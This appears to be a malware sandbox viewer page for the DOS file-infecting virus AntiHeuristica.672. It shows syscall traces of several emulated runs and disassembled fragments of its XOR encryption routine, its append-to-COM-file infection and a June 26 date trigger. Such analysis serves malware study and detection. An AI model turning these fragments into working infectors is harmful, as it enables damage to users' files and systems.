Sample viewer

vx.netlux.org/Virus.DOS.AntiHeuristica.672

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:05:07.605829387Z 37 PC: 15538 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T23:05:07.608809266Z 37 PC: 1555e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T23:05:07.611096793Z 78 PC: 15592 | Find first file
2018-12-17T23:05:07.634726304Z 61 PC: 155b4 | Open file (Filename = 'c:\dos\EDIT.COM')
2018-12-17T23:05:07.643894728Z 63 PC: 15736 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:05:07.654942223Z 66 PC: 155c3 | Move file pointer
2018-12-17T23:05:07.656448199Z 62 PC: 155d8 | Close file
2018-12-17T23:05:07.65881584Z 67 PC: 156d7 | Get or set file attributes
2018-12-17T23:05:07.999527571Z 61 PC: 156e5 | Open file (Filename = 'c:\dos\EDIT.COM')
2018-12-17T23:05:08.007701154Z 64 PC: 156f2 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:05:08.011258249Z 66 PC: 15707 | Move file pointer
2018-12-17T23:05:08.014034002Z 44 PC: 157d0 | Get time 0x157d0: mov word ptr [bp + 0x394], dx
0x157d4: lea si, word ptr [bp + 0x118]
0x157d8: mov ax, word ptr [bp + 0x394]
0x157dc: mov cx, 0x13c
0x157df: xor word ptr [si], ax
0x157e1: inc si
0x157e2: inc si
0x157e3: loop 0x157df
0x157e5: mov ah, 0x40
0x157e7: mov cx, 0x2a0
0x157ea: lea dx, word ptr [bp + 0x108]
0x157ee: int 0x21
0x157f0: lea si, word ptr [bp + 0x118]
0x157f4: mov ax, word ptr [bp + 0x394]
0x157f8: mov cx, 0x13c
0x157fb: xor word ptr [si], ax
0x157fd: inc si
0x157fe: inc si
0x157ff: loop 0x157fb
0x15801: ret
2018-12-17T23:05:08.016996471Z 64 PC: 157f0 | Write file or device (Write 672 bytes on handle 5)
2018-12-17T23:05:08.02575462Z 87 PC: 15718 | Get or set file date and time
2018-12-17T23:05:08.030759582Z 62 PC: 1571c | Close file
2018-12-17T23:05:08.041341362Z 67 PC: 1572a | Get or set file attributes
2018-12-17T23:05:08.052676054Z 79 PC: 155ec | Find next file
2018-12-17T23:05:08.057159219Z 61 PC: 155b4 | Open file (Filename = 'c:\dos\FORMAT.COM')
2018-12-17T23:05:08.064901527Z 63 PC: 15736 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:05:08.071533338Z 66 PC: 155c3 | Move file pointer
2018-12-17T23:05:08.07423869Z 62 PC: 155d8 | Close file
2018-12-17T23:05:08.077981181Z 67 PC: 156d7 | Get or set file attributes
2018-12-17T23:05:08.088706604Z 61 PC: 156e5 | Open file (Filename = 'c:\dos\FORMAT.COM')
2018-12-17T23:05:08.096860092Z 64 PC: 156f2 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:05:08.101309443Z 66 PC: 15707 | Move file pointer
2018-12-17T23:05:08.102879244Z 44 PC: 157d0 | Get time 0x157d0: mov word ptr [bp + 0x394], dx
0x157d4: lea si, word ptr [bp + 0x118]
0x157d8: mov ax, word ptr [bp + 0x394]
0x157dc: mov cx, 0x13c
0x157df: xor word ptr [si], ax
0x157e1: inc si
0x157e2: inc si
0x157e3: loop 0x157df
0x157e5: mov ah, 0x40
0x157e7: mov cx, 0x2a0
0x157ea: lea dx, word ptr [bp + 0x108]
0x157ee: int 0x21
0x157f0: lea si, word ptr [bp + 0x118]
0x157f4: mov ax, word ptr [bp + 0x394]
0x157f8: mov cx, 0x13c
0x157fb: xor word ptr [si], ax
0x157fd: inc si
0x157fe: inc si
0x157ff: loop 0x157fb
0x15801: ret
2018-12-17T23:05:08.105344763Z 64 PC: 157f0 | Write file or device (Write 672 bytes on handle 5)
2018-12-17T23:05:08.114316473Z 87 PC: 15718 | Get or set file date and time
2018-12-17T23:05:08.116127326Z 62 PC: 1571c | Close file
2018-12-17T23:05:08.123378408Z 67 PC: 1572a | Get or set file attributes
2018-12-17T23:05:08.135184933Z 79 PC: 155ec | Find next file
2018-12-17T23:05:08.138940491Z 61 PC: 155b4 | Open file (Filename = 'c:\dos\KEYB.COM')
2018-12-17T23:05:08.147026144Z 63 PC: 15736 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:05:08.154170993Z 66 PC: 155c3 | Move file pointer
2018-12-17T23:05:08.156562647Z 62 PC: 155d8 | Close file
2018-12-17T23:05:08.158968555Z 67 PC: 156d7 | Get or set file attributes
2018-12-17T23:05:08.171662449Z 61 PC: 156e5 | Open file (Filename = 'c:\dos\KEYB.COM')
2018-12-17T23:05:08.179770332Z 64 PC: 156f2 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:05:08.183335771Z 66 PC: 15707 | Move file pointer
2018-12-17T23:05:08.18606579Z 44 PC: 157d0 | Get time 0x157d0: mov word ptr [bp + 0x394], dx
0x157d4: lea si, word ptr [bp + 0x118]
0x157d8: mov ax, word ptr [bp + 0x394]
0x157dc: mov cx, 0x13c
0x157df: xor word ptr [si], ax
0x157e1: inc si
0x157e2: inc si
0x157e3: loop 0x157df
0x157e5: mov ah, 0x40
0x157e7: mov cx, 0x2a0
0x157ea: lea dx, word ptr [bp + 0x108]
0x157ee: int 0x21
0x157f0: lea si, word ptr [bp + 0x118]
0x157f4: mov ax, word ptr [bp + 0x394]
0x157f8: mov cx, 0x13c
0x157fb: xor word ptr [si], ax
0x157fd: inc si
0x157fe: inc si
0x157ff: loop 0x157fb
0x15801: ret
2018-12-17T23:05:08.189164832Z 64 PC: 157f0 | Write file or device (Write 672 bytes on handle 5)
2018-12-17T23:05:08.200491508Z 87 PC: 15718 | Get or set file date and time
2018-12-17T23:05:08.202350088Z 62 PC: 1571c | Close file
2018-12-17T23:05:08.211063159Z 67 PC: 1572a | Get or set file attributes
2018-12-17T23:05:08.222765976Z 79 PC: 155ec | Find next file
2018-12-17T23:05:08.231425919Z 61 PC: 155b4 | Open file (Filename = 'c:\dos\SYS.COM')
2018-12-17T23:05:08.240159421Z 63 PC: 15736 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:05:08.247019598Z 66 PC: 155c3 | Move file pointer
2018-12-17T23:05:08.248794756Z 62 PC: 155d8 | Close file
2018-12-17T23:05:08.251821501Z 67 PC: 156d7 | Get or set file attributes
2018-12-17T23:05:08.263524861Z 61 PC: 156e5 | Open file (Filename = 'c:\dos\SYS.COM')
2018-12-17T23:05:08.271514759Z 64 PC: 156f2 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:05:08.275969067Z 66 PC: 15707 | Move file pointer
2018-12-17T23:05:08.278620895Z 44 PC: 157d0 | Get time 0x157d0: mov word ptr [bp + 0x394], dx
0x157d4: lea si, word ptr [bp + 0x118]
0x157d8: mov ax, word ptr [bp + 0x394]
0x157dc: mov cx, 0x13c
0x157df: xor word ptr [si], ax
0x157e1: inc si
0x157e2: inc si
0x157e3: loop 0x157df
0x157e5: mov ah, 0x40
0x157e7: mov cx, 0x2a0
0x157ea: lea dx, word ptr [bp + 0x108]
0x157ee: int 0x21
0x157f0: lea si, word ptr [bp + 0x118]
0x157f4: mov ax, word ptr [bp + 0x394]
0x157f8: mov cx, 0x13c
0x157fb: xor word ptr [si], ax
0x157fd: inc si
0x157fe: inc si
0x157ff: loop 0x157fb
0x15801: ret
2018-12-17T23:05:08.28161776Z 64 PC: 157f0 | Write file or device (Write 672 bytes on handle 5)
2018-12-17T23:05:08.290992697Z 87 PC: 15718 | Get or set file date and time
2018-12-17T23:05:08.293579686Z 62 PC: 1571c | Close file
2018-12-17T23:05:08.302493555Z 67 PC: 1572a | Get or set file attributes
2018-12-17T23:05:08.31450483Z 79 PC: 155ec | Find next file
2018-12-17T23:05:08.322833321Z 42 PC: 15671 | Get date 0x15671: cmp dh, 6
0x15674: jne 0x15682
0x15676: cmp dl, 0x1a
0x15679: jne 0x15682
0x1567b: call 0x15754
0x1567e: mov ah, 0x4c
0x15680: int 0x21
0x15682: mov ax, 0x100
0x15685: push ax
0x15686: xor ax, ax
0x15688: xor bx, bx
0x1568a: xor cx, cx
0x1568c: xor dx, dx
0x1568e: xor di, di
0x15690: xor si, si
0x15692: xor bp, bp
0x15694: ret
0x15695: jmp 0x1bfee
0x15698: jb 0x1570f
0x1569a: jae 0x156bc
2018-12-17T23:05:08.326510528Z 99 PC: 143ba | Get DBCS lead byte table pointer
2018-12-17T23:05:08.330366178Z 68 PC: 143d4 | I/O control for devices (Set for = '')
2018-12-17T23:05:08.333451231Z 68 PC: 143df | I/O control for devices (Set for = '')
2018-12-17T23:05:08.336163098Z 68 PC: 143ea | I/O control for devices (Set for = '')
2018-12-17T23:05:08.338092225Z 68 PC: 143f2 | I/O control for devices (Set for = '��b���g�t�S3����[r�2��W�<t�<u�6�u����>��>W')
2018-12-17T23:05:08.341356017Z 48 PC: 143f7 | Get DOS version
2018-12-17T23:05:08.343335163Z 64 PC: 14535 | Write file or device (Write 27 bytes on handle 2)
2018-12-17T23:05:08.352934829Z 76 PC: 131dd | Terminate with return code (Return code = '4')

{"DateBased":true,"Day":26,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":15109,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:39.067310666Z 37 PC: 15538 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:42:39.069657592Z 37 PC: 1555e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:42:39.072733457Z 78 PC: 15592 | Find first file
2018-12-25T12:42:39.083202692Z 61 PC: 155b4 | Open file (Filename = 'c:\dos\EDIT.COM')
2018-12-25T12:42:39.090944758Z 63 PC: 15736 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:39.098111881Z 66 PC: 155c3 | Move file pointer
2018-12-25T12:42:39.099776104Z 62 PC: 155d8 | Close file
2018-12-25T12:42:39.102519562Z 67 PC: 156d7 | Get or set file attributes
2018-12-25T12:42:39.789998415Z 61 PC: 156e5 | Open file (Filename = 'c:\dos\EDIT.COM')
2018-12-25T12:42:39.801166559Z 64 PC: 156f2 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:39.805233021Z 66 PC: 15707 | Move file pointer
2018-12-25T12:42:39.808282588Z 44 PC: 157d0 | Get time 0x157d0: mov word ptr [bp + 0x394], dx
0x157d4: lea si, word ptr [bp + 0x118]
0x157d8: mov ax, word ptr [bp + 0x394]
0x157dc: mov cx, 0x13c
0x157df: xor word ptr [si], ax
0x157e1: inc si
0x157e2: inc si
0x157e3: loop 0x157df
0x157e5: mov ah, 0x40
0x157e7: mov cx, 0x2a0
0x157ea: lea dx, word ptr [bp + 0x108]
0x157ee: int 0x21
0x157f0: lea si, word ptr [bp + 0x118]
0x157f4: mov ax, word ptr [bp + 0x394]
0x157f8: mov cx, 0x13c
0x157fb: xor word ptr [si], ax
0x157fd: inc si
0x157fe: inc si
0x157ff: loop 0x157fb
0x15801: ret
2018-12-25T12:42:39.811557484Z 64 PC: 157f0 | Write file or device (Write 672 bytes on handle 5)
2018-12-25T12:42:39.820646871Z 87 PC: 15718 | Get or set file date and time
2018-12-25T12:42:39.823764416Z 62 PC: 1571c | Close file
2018-12-25T12:42:39.832034526Z 67 PC: 1572a | Get or set file attributes
2018-12-25T12:42:39.843668962Z 79 PC: 155ec | Find next file
2018-12-25T12:42:39.847506521Z 61 PC: 155b4 | Open file (See above)
2018-12-25T12:42:39.857842359Z 63 PC: 15736 | Read file or device (See above)
2018-12-25T12:42:39.86515071Z 66 PC: 155c3 | Move file pointer (See above)
2018-12-25T12:42:39.867392214Z 62 PC: 155d8 | Close file (See above)
2018-12-25T12:42:39.871262072Z 67 PC: 156d7 | Get or set file attributes (See above)
2018-12-25T12:42:39.882195587Z 61 PC: 156e5 | Open file (See above)
2018-12-25T12:42:39.890156005Z 64 PC: 156f2 | Write file or device (See above)
2018-12-25T12:42:39.894917582Z 66 PC: 15707 | Move file pointer (See above)
2018-12-25T12:42:39.897101043Z 44 PC: 157d0 | Get time (See above)
2018-12-25T12:42:39.90030288Z 64 PC: 157f0 | Write file or device (See above)
2018-12-25T12:42:39.910291378Z 87 PC: 15718 | Get or set file date and time (See above)
2018-12-25T12:42:39.921517532Z 62 PC: 1571c | Close file (See above)
2018-12-25T12:42:39.930027578Z 67 PC: 1572a | Get or set file attributes (See above)
2018-12-25T12:42:39.943925435Z 79 PC: 155ec | Find next file (See above)
2018-12-25T12:42:39.948619991Z 61 PC: 155b4 | Open file (See above)
2018-12-25T12:42:39.956838178Z 63 PC: 15736 | Read file or device (See above)
2018-12-25T12:42:39.963275267Z 66 PC: 155c3 | Move file pointer (See above)
2018-12-25T12:42:39.966501814Z 62 PC: 155d8 | Close file (See above)
2018-12-25T12:42:39.969016009Z 67 PC: 156d7 | Get or set file attributes (See above)
2018-12-25T12:42:39.986283468Z 61 PC: 156e5 | Open file (See above)
2018-12-25T12:42:39.995112451Z 64 PC: 156f2 | Write file or device (See above)
2018-12-25T12:42:39.998551231Z 66 PC: 15707 | Move file pointer (See above)
2018-12-25T12:42:40.000555069Z 44 PC: 157d0 | Get time (See above)
2018-12-25T12:42:40.00518925Z 64 PC: 157f0 | Write file or device (See above)
2018-12-25T12:42:40.020535347Z 87 PC: 15718 | Get or set file date and time (See above)
2018-12-25T12:42:40.022631227Z 62 PC: 1571c | Close file (See above)
2018-12-25T12:42:40.09972843Z 67 PC: 1572a | Get or set file attributes (See above)
2018-12-25T12:42:40.135524208Z 79 PC: 155ec | Find next file (See above)
2018-12-25T12:42:40.143432437Z 61 PC: 155b4 | Open file (See above)
2018-12-25T12:42:40.152945406Z 63 PC: 15736 | Read file or device (See above)
2018-12-25T12:42:40.160517714Z 66 PC: 155c3 | Move file pointer (See above)
2018-12-25T12:42:40.162501927Z 62 PC: 155d8 | Close file (See above)
2018-12-25T12:42:40.165666058Z 67 PC: 156d7 | Get or set file attributes (See above)
2018-12-25T12:42:40.184173252Z 61 PC: 156e5 | Open file (See above)
2018-12-25T12:42:40.193155304Z 64 PC: 156f2 | Write file or device (See above)
2018-12-25T12:42:40.196332223Z 66 PC: 15707 | Move file pointer (See above)
2018-12-25T12:42:40.198960256Z 44 PC: 157d0 | Get time (See above)
2018-12-25T12:42:40.201863481Z 64 PC: 157f0 | Write file or device (See above)
2018-12-25T12:42:40.263164165Z 87 PC: 15718 | Get or set file date and time (See above)
2018-12-25T12:42:40.266410733Z 62 PC: 1571c | Close file (See above)
2018-12-25T12:42:40.283905336Z 67 PC: 1572a | Get or set file attributes (See above)
2018-12-25T12:42:40.298263745Z 79 PC: 155ec | Find next file (See above)
2018-12-25T12:42:40.306680383Z 42 PC: 15671 | Get date 0x15671: cmp dh, 6
0x15674: jne 0x15682
0x15676: cmp dl, 0x1a
0x15679: jne 0x15682
0x1567b: call 0x15754
0x1567e: mov ah, 0x4c
0x15680: int 0x21
0x15682: mov ax, 0x100
0x15685: push ax
0x15686: xor ax, ax
0x15688: xor bx, bx
0x1568a: xor cx, cx
0x1568c: xor dx, dx
0x1568e: xor di, di
0x15690: xor si, si
0x15692: xor bp, bp
0x15694: ret
0x15695: jmp 0x1bfee
0x15698: jb 0x1570f
0x1569a: jae 0x156bc
2018-12-25T12:42:40.311795426Z 76 PC: 15682 | Terminate with return code (Return code = '32')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":15109,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:39.215182703Z 37 PC: 15538 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:42:39.217661901Z 37 PC: 1555e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:42:39.219121897Z 78 PC: 15592 | Find first file
2018-12-25T12:42:39.229091331Z 61 PC: 155b4 | Open file (Filename = 'c:\dos\EDIT.COM')
2018-12-25T12:42:39.237236146Z 63 PC: 15736 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:39.243377709Z 66 PC: 155c3 | Move file pointer
2018-12-25T12:42:39.246142661Z 62 PC: 155d8 | Close file
2018-12-25T12:42:39.249001224Z 67 PC: 156d7 | Get or set file attributes
2018-12-25T12:42:39.788927166Z 61 PC: 156e5 | Open file (Filename = 'c:\dos\EDIT.COM')
2018-12-25T12:42:39.798126518Z 64 PC: 156f2 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:39.802088997Z 66 PC: 15707 | Move file pointer
2018-12-25T12:42:39.804282979Z 44 PC: 157d0 | Get time 0x157d0: mov word ptr [bp + 0x394], dx
0x157d4: lea si, word ptr [bp + 0x118]
0x157d8: mov ax, word ptr [bp + 0x394]
0x157dc: mov cx, 0x13c
0x157df: xor word ptr [si], ax
0x157e1: inc si
0x157e2: inc si
0x157e3: loop 0x157df
0x157e5: mov ah, 0x40
0x157e7: mov cx, 0x2a0
0x157ea: lea dx, word ptr [bp + 0x108]
0x157ee: int 0x21
0x157f0: lea si, word ptr [bp + 0x118]
0x157f4: mov ax, word ptr [bp + 0x394]
0x157f8: mov cx, 0x13c
0x157fb: xor word ptr [si], ax
0x157fd: inc si
0x157fe: inc si
0x157ff: loop 0x157fb
0x15801: ret
2018-12-25T12:42:39.806908444Z 64 PC: 157f0 | Write file or device (Write 672 bytes on handle 5)
2018-12-25T12:42:39.815733058Z 87 PC: 15718 | Get or set file date and time
2018-12-25T12:42:39.818201056Z 62 PC: 1571c | Close file
2018-12-25T12:42:39.839421994Z 67 PC: 1572a | Get or set file attributes
2018-12-25T12:42:39.85201704Z 79 PC: 155ec | Find next file
2018-12-25T12:42:39.857013347Z 61 PC: 155b4 | Open file (See above)
2018-12-25T12:42:39.865570476Z 63 PC: 15736 | Read file or device (See above)
2018-12-25T12:42:39.872312754Z 66 PC: 155c3 | Move file pointer (See above)
2018-12-25T12:42:39.875470959Z 62 PC: 155d8 | Close file (See above)
2018-12-25T12:42:39.87833915Z 67 PC: 156d7 | Get or set file attributes (See above)
2018-12-25T12:42:39.89025226Z 61 PC: 156e5 | Open file (See above)
2018-12-25T12:42:39.899557754Z 64 PC: 156f2 | Write file or device (See above)
2018-12-25T12:42:39.903588245Z 66 PC: 15707 | Move file pointer (See above)
2018-12-25T12:42:39.906525693Z 44 PC: 157d0 | Get time (See above)
2018-12-25T12:42:39.909944098Z 64 PC: 157f0 | Write file or device (See above)
2018-12-25T12:42:39.919549852Z 87 PC: 15718 | Get or set file date and time (See above)
2018-12-25T12:42:39.921355116Z 62 PC: 1571c | Close file (See above)
2018-12-25T12:42:39.929395932Z 67 PC: 1572a | Get or set file attributes (See above)
2018-12-25T12:42:39.949437234Z 79 PC: 155ec | Find next file (See above)
2018-12-25T12:42:39.952848057Z 61 PC: 155b4 | Open file (See above)
2018-12-25T12:42:39.960592868Z 63 PC: 15736 | Read file or device (See above)
2018-12-25T12:42:39.968446337Z 66 PC: 155c3 | Move file pointer (See above)
2018-12-25T12:42:39.970465513Z 62 PC: 155d8 | Close file (See above)
2018-12-25T12:42:39.97288442Z 67 PC: 156d7 | Get or set file attributes (See above)
2018-12-25T12:42:39.990454552Z 61 PC: 156e5 | Open file (See above)
2018-12-25T12:42:39.999373972Z 64 PC: 156f2 | Write file or device (See above)
2018-12-25T12:42:40.003035555Z 66 PC: 15707 | Move file pointer (See above)
2018-12-25T12:42:40.00557639Z 44 PC: 157d0 | Get time (See above)
2018-12-25T12:42:40.010381899Z 64 PC: 157f0 | Write file or device (See above)
2018-12-25T12:42:40.020687301Z 87 PC: 15718 | Get or set file date and time (See above)
2018-12-25T12:42:40.022726009Z 62 PC: 1571c | Close file (See above)
2018-12-25T12:42:40.050225738Z 67 PC: 1572a | Get or set file attributes (See above)
2018-12-25T12:42:40.098487233Z 79 PC: 155ec | Find next file (See above)
2018-12-25T12:42:40.107707969Z 61 PC: 155b4 | Open file (See above)
2018-12-25T12:42:40.116729599Z 63 PC: 15736 | Read file or device (See above)
2018-12-25T12:42:40.123147836Z 66 PC: 155c3 | Move file pointer (See above)
2018-12-25T12:42:40.124808526Z 62 PC: 155d8 | Close file (See above)
2018-12-25T12:42:40.128121437Z 67 PC: 156d7 | Get or set file attributes (See above)
2018-12-25T12:42:40.151658771Z 61 PC: 156e5 | Open file (See above)
2018-12-25T12:42:40.160418968Z 64 PC: 156f2 | Write file or device (See above)
2018-12-25T12:42:40.165038838Z 66 PC: 15707 | Move file pointer (See above)
2018-12-25T12:42:40.167082164Z 44 PC: 157d0 | Get time (See above)
2018-12-25T12:42:40.170237028Z 64 PC: 157f0 | Write file or device (See above)
2018-12-25T12:42:40.190192095Z 87 PC: 15718 | Get or set file date and time (See above)
2018-12-25T12:42:40.192711491Z 62 PC: 1571c | Close file (See above)
2018-12-25T12:42:40.254932912Z 67 PC: 1572a | Get or set file attributes (See above)
2018-12-25T12:42:40.284505291Z 79 PC: 155ec | Find next file (See above)
2018-12-25T12:42:40.291894529Z 42 PC: 15671 | Get date 0x15671: cmp dh, 6
0x15674: jne 0x15682
0x15676: cmp dl, 0x1a
0x15679: jne 0x15682
0x1567b: call 0x15754
0x1567e: mov ah, 0x4c
0x15680: int 0x21
0x15682: mov ax, 0x100
0x15685: push ax
0x15686: xor ax, ax
0x15688: xor bx, bx
0x1568a: xor cx, cx
0x1568c: xor dx, dx
0x1568e: xor di, di
0x15690: xor si, si
0x15692: xor bp, bp
0x15694: ret
0x15695: jmp 0x1bfee
0x15698: jb 0x1570f
0x1569a: jae 0x156bc
2018-12-25T12:42:40.295032554Z 99 PC: 143ba | Get DBCS lead byte table pointer
2018-12-25T12:42:40.296980815Z 68 PC: 143d4 | I/O control for devices (Set for = '')
2018-12-25T12:42:40.309750418Z 68 PC: 143df | I/O control for devices (Set for = '')
2018-12-25T12:42:40.312093683Z 68 PC: 143ea | I/O control for devices (Set for = '')
2018-12-25T12:42:40.31421075Z 68 PC: 143f2 | I/O control for devices (Set for = '��b���g�t�S3����[r�2��W�<t�<u�6�u����>��>W')
2018-12-25T12:42:40.31767476Z 48 PC: 143f7 | Get DOS version
2018-12-25T12:42:40.320045953Z 64 PC: 14535 | Write file or device (Write 27 bytes on handle 2)
2018-12-25T12:42:40.32587106Z 76 PC: 131dd | Terminate with return code (Return code = '4')

{"DateBased":true,"Day":1,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":15109,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:39.568485771Z 37 PC: 15538 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:42:39.571241774Z 37 PC: 1555e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:42:39.574484122Z 78 PC: 15592 | Find first file
2018-12-25T12:42:39.585296598Z 61 PC: 155b4 | Open file (Filename = 'c:\dos\EDIT.COM')
2018-12-25T12:42:39.59368462Z 63 PC: 15736 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:39.599972207Z 66 PC: 155c3 | Move file pointer
2018-12-25T12:42:39.601354682Z 62 PC: 155d8 | Close file
2018-12-25T12:42:39.603082464Z 67 PC: 156d7 | Get or set file attributes
2018-12-25T12:42:40.424856729Z 61 PC: 156e5 | Open file (Filename = 'c:\dos\EDIT.COM')
2018-12-25T12:42:40.431830422Z 64 PC: 156f2 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:40.434150262Z 66 PC: 15707 | Move file pointer
2018-12-25T12:42:40.435575876Z 44 PC: 157d0 | Get time 0x157d0: mov word ptr [bp + 0x394], dx
0x157d4: lea si, word ptr [bp + 0x118]
0x157d8: mov ax, word ptr [bp + 0x394]
0x157dc: mov cx, 0x13c
0x157df: xor word ptr [si], ax
0x157e1: inc si
0x157e2: inc si
0x157e3: loop 0x157df
0x157e5: mov ah, 0x40
0x157e7: mov cx, 0x2a0
0x157ea: lea dx, word ptr [bp + 0x108]
0x157ee: int 0x21
0x157f0: lea si, word ptr [bp + 0x118]
0x157f4: mov ax, word ptr [bp + 0x394]
0x157f8: mov cx, 0x13c
0x157fb: xor word ptr [si], ax
0x157fd: inc si
0x157fe: inc si
0x157ff: loop 0x157fb
0x15801: ret
2018-12-25T12:42:40.438076575Z 64 PC: 157f0 | Write file or device (Write 672 bytes on handle 5)
2018-12-25T12:42:40.443123461Z 87 PC: 15718 | Get or set file date and time
2018-12-25T12:42:40.458515104Z 62 PC: 1571c | Close file
2018-12-25T12:42:40.462866677Z 67 PC: 1572a | Get or set file attributes
2018-12-25T12:42:40.468996391Z 79 PC: 155ec | Find next file
2018-12-25T12:42:40.471547919Z 61 PC: 155b4 | Open file (See above)
2018-12-25T12:42:40.476182997Z 63 PC: 15736 | Read file or device (See above)
2018-12-25T12:42:40.480924449Z 66 PC: 155c3 | Move file pointer (See above)
2018-12-25T12:42:40.483312736Z 62 PC: 155d8 | Close file (See above)
2018-12-25T12:42:40.485201536Z 67 PC: 156d7 | Get or set file attributes (See above)
2018-12-25T12:42:40.494798416Z 61 PC: 156e5 | Open file (See above)
2018-12-25T12:42:40.502409285Z 64 PC: 156f2 | Write file or device (See above)
2018-12-25T12:42:40.506054239Z 66 PC: 15707 | Move file pointer (See above)
2018-12-25T12:42:40.507319995Z 44 PC: 157d0 | Get time (See above)
2018-12-25T12:42:40.509993576Z 64 PC: 157f0 | Write file or device (See above)
2018-12-25T12:42:40.517741868Z 87 PC: 15718 | Get or set file date and time (See above)
2018-12-25T12:42:40.519177604Z 62 PC: 1571c | Close file (See above)
2018-12-25T12:42:40.527568463Z 67 PC: 1572a | Get or set file attributes (See above)
2018-12-25T12:42:40.537614055Z 79 PC: 155ec | Find next file (See above)
2018-12-25T12:42:40.540879015Z 61 PC: 155b4 | Open file (See above)
2018-12-25T12:42:40.549105958Z 63 PC: 15736 | Read file or device (See above)
2018-12-25T12:42:40.555402065Z 66 PC: 155c3 | Move file pointer (See above)
2018-12-25T12:42:40.556649947Z 62 PC: 155d8 | Close file (See above)
2018-12-25T12:42:40.558188708Z 67 PC: 156d7 | Get or set file attributes (See above)
2018-12-25T12:42:40.566577618Z 61 PC: 156e5 | Open file (See above)
2018-12-25T12:42:40.570591446Z 64 PC: 156f2 | Write file or device (See above)
2018-12-25T12:42:40.572298261Z 66 PC: 15707 | Move file pointer (See above)
2018-12-25T12:42:40.574103353Z 44 PC: 157d0 | Get time (See above)
2018-12-25T12:42:40.576084659Z 64 PC: 157f0 | Write file or device (See above)
2018-12-25T12:42:40.585536682Z 87 PC: 15718 | Get or set file date and time (See above)
2018-12-25T12:42:40.587858902Z 62 PC: 1571c | Close file (See above)
2018-12-25T12:42:40.594772273Z 67 PC: 1572a | Get or set file attributes (See above)
2018-12-25T12:42:40.60425052Z 79 PC: 155ec | Find next file (See above)
2018-12-25T12:42:40.611351347Z 61 PC: 155b4 | Open file (See above)
2018-12-25T12:42:40.618026377Z 63 PC: 15736 | Read file or device (See above)
2018-12-25T12:42:40.623199264Z 66 PC: 155c3 | Move file pointer (See above)
2018-12-25T12:42:40.624885741Z 62 PC: 155d8 | Close file (See above)
2018-12-25T12:42:40.626480245Z 67 PC: 156d7 | Get or set file attributes (See above)
2018-12-25T12:42:40.635767891Z 61 PC: 156e5 | Open file (See above)
2018-12-25T12:42:40.6428888Z 64 PC: 156f2 | Write file or device (See above)
2018-12-25T12:42:40.645516655Z 66 PC: 15707 | Move file pointer (See above)
2018-12-25T12:42:40.646626331Z 44 PC: 157d0 | Get time (See above)
2018-12-25T12:42:40.649103715Z 64 PC: 157f0 | Write file or device (See above)
2018-12-25T12:42:40.656190895Z 87 PC: 15718 | Get or set file date and time (See above)
2018-12-25T12:42:40.657370374Z 62 PC: 1571c | Close file (See above)
2018-12-25T12:42:40.664355671Z 67 PC: 1572a | Get or set file attributes (See above)
2018-12-25T12:42:40.674479789Z 79 PC: 155ec | Find next file (See above)
2018-12-25T12:42:40.67919717Z 42 PC: 15671 | Get date 0x15671: cmp dh, 6
0x15674: jne 0x15682
0x15676: cmp dl, 0x1a
0x15679: jne 0x15682
0x1567b: call 0x15754
0x1567e: mov ah, 0x4c
0x15680: int 0x21
0x15682: mov ax, 0x100
0x15685: push ax
0x15686: xor ax, ax
0x15688: xor bx, bx
0x1568a: xor cx, cx
0x1568c: xor dx, dx
0x1568e: xor di, di
0x15690: xor si, si
0x15692: xor bp, bp
0x15694: ret
0x15695: jmp 0x1bfee
0x15698: jb 0x1570f
0x1569a: jae 0x156bc
2018-12-25T12:42:40.681649931Z 99 PC: 143ba | Get DBCS lead byte table pointer
2018-12-25T12:42:40.682561448Z 68 PC: 143d4 | I/O control for devices (Set for = '')
2018-12-25T12:42:40.683473423Z 68 PC: 143df | I/O control for devices (Set for = '')
2018-12-25T12:42:40.685185411Z 68 PC: 143ea | I/O control for devices (Set for = '')
2018-12-25T12:42:40.686107299Z 68 PC: 143f2 | I/O control for devices (Set for = '��b���g�t�S3����[r�2��W�<t�<u�6�u����>��>W')
2018-12-25T12:42:40.687140466Z 48 PC: 143f7 | Get DOS version
2018-12-25T12:42:40.688790065Z 64 PC: 14535 | Write file or device (Write 27 bytes on handle 2)
2018-12-25T12:42:40.691529791Z 76 PC: 131dd | Terminate with return code (Return code = '4')